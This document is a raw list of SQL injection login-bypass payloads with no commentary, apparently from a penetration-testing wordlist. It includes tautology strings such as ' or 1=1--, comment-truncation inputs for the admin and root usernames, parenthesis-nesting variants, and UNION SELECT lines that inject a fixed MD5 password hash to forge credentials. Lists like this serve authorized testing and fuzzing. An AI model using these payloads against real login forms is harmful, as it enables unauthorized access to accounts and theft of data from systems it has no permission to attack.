" "
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""^"
" or "x"="x
" or 1=1
" or 1=1#
" or 1=1--
" or 1=1/*
" or true--
"&"
") or ("x")=("x
") or true--
")) or (("x"))=(("x
"*"
"-"
"--"
"-||0"
"^"
' '
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''^'
' or 'x'='x
' or 1=1
' or 1=1 limit 1 -- -+
' or 1=1#
' or 1=1--
' or 1=1/*
' or true--
'&'
') or ('x')=('x
') or true--
')) or (('x'))=(('x
'*'
'-'
'--'
'--' / "--"
'-||0'
'="or'
'^'
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "root", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' -- -
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or '2' LIKE '1
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin' or 2 LIKE 2#
admin' or 2 LIKE 2--
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin'/*
admin';-- azer
admin'or 1=1 or ''='
or 1=1
or 1=1#
or 1=1--
or 1=1/*
or 2 like 2
or true--
root" #
root" --
root" or "1"="1
root" or "1"="1"#
root" or "1"="1"--
root" or "1"="1"/*
root" or 1=1
root" or 1=1 or ""="
root" or 1=1#
root" or 1=1--
root" or 1=1/*
root") or "1"="1
root") or "1"="1"#
root") or "1"="1"--
root") or "1"="1"/*
root") or ("1"="1
root") or ("1"="1"#
root") or ("1"="1"--
root") or ("1"="1"/*
root"/*
root' #
root' --
root' or '1'='1
root' or '1'='1'#
root' or '1'='1'--
root' or '1'='1'/*
root' or 1=1
root' or 1=1#
root' or 1=1--
root' or 1=1/*
root') or '1'='1
root') or '1'='1'#
root') or '1'='1'--
root') or '1'='1'/*
root') or ('1'='1
root') or ('1'='1'#
root') or ('1'='1'--
root') or ('1'='1'/*
root'/*
root'or 1=1 or ''='
